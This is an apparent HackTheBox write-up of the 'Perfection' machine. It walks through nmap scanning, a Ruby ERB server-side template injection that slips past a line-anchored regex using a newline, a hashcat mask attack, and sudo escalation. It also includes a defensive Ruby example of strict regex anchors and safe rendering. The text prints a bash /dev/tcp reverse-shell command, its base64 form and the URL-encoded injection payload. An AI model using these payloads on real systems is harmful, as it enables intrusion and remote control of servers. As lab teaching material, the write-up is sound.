Welcome! It is time to look at the Perfection machine on HackTheBox. I am making these walkthroughs to keep myself motivated to learn cyber security and ensure that I remember the knowledge gained by playing HTB machines.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Level — Easy
OS — Linux
Machine URL: Hack The Box
About Perfection — Perfection is an easy Linux machine that features a web application with functionality to calculate student scores. This application is vulnerable to Server-Side Template Injection (SSTI) via regex filter bypass. A foothold can be gained by exploiting the SSTI vulnerability. Enumerating the user reveals they are part of the `sudo` group. Further enumeration uncovers a database with password hashes, and the user's mail reveals a possible password format. Using a mask attack on the hash, the user's password is obtained, which is leveraged to gain `root` access.
Enumeration
To kick off this box, let’s run a Nmap scan to see what services and ports are open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -A -Pn 10.10.11.253
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 14:02 EDT
Nmap scan report for perfection.htb (10.10.11.253)
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 196.07 ms 10.10.14.1
2 196.11 ms perfection.htb (10.10.11.253)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.12 seconds
The scan shows two open TCP ports: 22, running OpenSSH 8.9p1, and 80, running nginx and serving a page titled "Weighted Grade Calculator".
Let's add the Perfection host to our /etc/hosts file (only tee needs sudo, since it is the process writing the file).
echo "10.10.11.253 perfection.htb" | sudo tee -a /etc/hosts
Browsing to the IP in Firefox shows the web application, the Weighted Grade Calculator.
At the bottom of the page there is a verbose version number.
Let's explore this version.
There don't seem to be any known vulnerabilities for 1.7.0, so let's keep looking around.
The site has input fields that we can try to inject code into.
The next step involves listening for incoming connections using nc -lvnp 1234.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
Obtaining a Reverse Shell
First, we will create a reverse shell script in bash.
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.15.7/1234 0>&1"
We encode it to base64 and copy it to the clipboard.
cat revshell.sh | base64 | xclip -sel clip
Alternatively, hURL can base64-encode the payload directly, and the result is then URL-encoded before injection. Encoding and decoding the payload is just data manipulation: the command inside it is a reverse shell, which the Weighted Grade Calculator ends up executing through the server-side template injection flaw in its rendering.
┌──(kali㉿kali)-[~]
└─$ hURL -B "bash -i >& /dev/tcp/10.10.15.7/1234 0>&1"
Original :: bash -i >& /dev/tcp/10.10.15.7/1234 0>&1
base64 ENcoded :: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS43LzEyMzQgMD4mMQ==
Inject Payload
Use Burp Suite to capture the POST Request. Then paste in the Payload.
Payload —
a%0A<%25%3d+system("echo+'<payload_base64_url_encoded>'+|base64+-d+|bash")%3b+%25>
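The `%0A` (a URL-encoded newline) placed before `<%=` is what carries the payload past the application's input filter. In Ruby, `^` and `$` match at line boundaries, so a pattern such as `/^[a-zA-Z]+$/` is satisfied by the first line and never examines what follows it; `\A` and `\z` anchor to the start and end of the whole string. The Ruby script below is an added example written for this write-up, not code from the box or from HackTheBox. The application's real filter is not shown here, so `WEAK_NAME_RE` is a hypothetical reconstruction of that class of mistake, and the sample input `"a\n<%= 6 * 7 %>"` is constructed with a harmless expression. It contrasts the weak and strict checks and, separately, a template that interpolates the input into the template source against one that passes the input as escaped data.

```ruby
# Added example (not the box's own code): why a newline slips past a Ruby
# regex anchored with ^ and $, and how a defender tightens the check.
# The grade calculator's real filter is not shown in the write-up; the
# regexes below are a hypothetical reconstruction of that class of bug.
require 'erb'
require 'cgi'

# Weak check: in Ruby, ^ and $ match at *line* boundaries, so the first
# line "a" satisfies the pattern and the rest of the input is never seen.
WEAK_NAME_RE = /^[a-zA-Z]+$/

# Fixed check: \A and \z anchor to the start and end of the whole string,
# so an embedded newline (or anything after it) causes the match to fail.
STRICT_NAME_RE = /\A[a-zA-Z]+\z/

def weak_valid?(value)
  value.match?(WEAK_NAME_RE)
end

def strict_valid?(value)
  value.match?(STRICT_NAME_RE)
end

# Vulnerable rendering: the input is concatenated into the template
# *source*, so any ERB tags it contains are compiled and executed.
def render_vulnerable(name)
  ERB.new("Hello #{name}!").result(binding)
end

# Safe rendering: the template is a fixed string and the input is passed
# in as data, HTML-escaped on output. ERB tags in the input stay text.
def render_safe(name)
  template = ERB.new("Hello <%= CGI.escapeHTML(name) %>!")
  template.result(binding)
end

# Summarise how each check and each renderer treats one input value.
def demo(value)
  {
    weak_accepts: weak_valid?(value),
    strict_accepts: strict_valid?(value),
    vulnerable_output: render_vulnerable(value),
    safe_output: render_safe(value)
  }
end

if __FILE__ == $PROGRAM_NAME
  benign = 'susan'
  # Constructed input: a valid first line, a newline, then a harmless
  # ERB expression standing in for whatever the template engine would run.
  bypass = "a\n<%= 6 * 7 %>"
  [benign, bypass].each { |v| puts demo(v).inspect }
end
```

Run it and the weak check accepts both inputs while the strict check accepts only `susan`; with the vulnerable renderer the second input produces `Hello a\n42!`, showing the expression was executed, whereas the safe renderer emits the tags as escaped text.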
Reverse shell received as susan-perfection
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.15.7] from (UNKNOWN) [10.10.11.253] 35964
bash: cannot set terminal process group (992): Inappropriate ioctl for device
bash: no job control in this shell
susan@perfection:~/ruby_app$ cd
susan@perfection:~$ ls
Migration ruby_app user.txt
susan@perfection:~$ cat user.txt
438da74ad9377edb00dff3a238b87ae5
User.txt — 438da74ad9377edb00dff3a238b87ae5
Privilege escalation
We could run `sudo -l` to list the commands susan is allowed to run with elevated privileges, but it prompts for the user's password, which we don't have yet, so it gets us nowhere for now.
Hehe!!! We found a hash in Migration.
Crack the Hash
I guessed from the hints that a mask attack was the way to go, so I used Hashcat to crack the hash with the following commands.
┌──(kali㉿kali)-[~]
└─$ echo "<HASH>" > hash.txt
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 hash.txt -a 3 "susan_nasus_?d?d?d?d?d?d?d?d?d"
┌──(kali㉿kali)-[~]
└─$ hashcat -m 1400 -a 3 hash.txt susan_nasus_?d?d?d?d?d?d?d?d?d --show
After some time, Hashcat returns the plaintext password.
susan:susan_nasus_413759210
With the password recovered, we can log in over SSH as susan and become superuser by running `sudo su`.
┌──(kali㉿kali)-[~]
└─$ ssh susan@10.10.11.253
Logged in as ‘susan’ re-using ‘susan_nasus_413759210’
Hehe!!! Finally, we got the root flag.
Root.txt — 0af9fc4be72846950b3ff4980c9b66a1
I hope you enjoyed this writeup! Happy Hacking :)
Follow me on the social media below:
1. LinkedIn: Reju Kole
2. Instagram: reju.kole.9
3. Respect me on HackTheBox: W40X
4. Check my TryHackMe profile: TryHackMe | W40X
5. Twitter | X: @Mr_W40X
6. GitHub: W40X | Reju Kole | Security Researcher
In case you need any help, feel free to message me on my social media handles.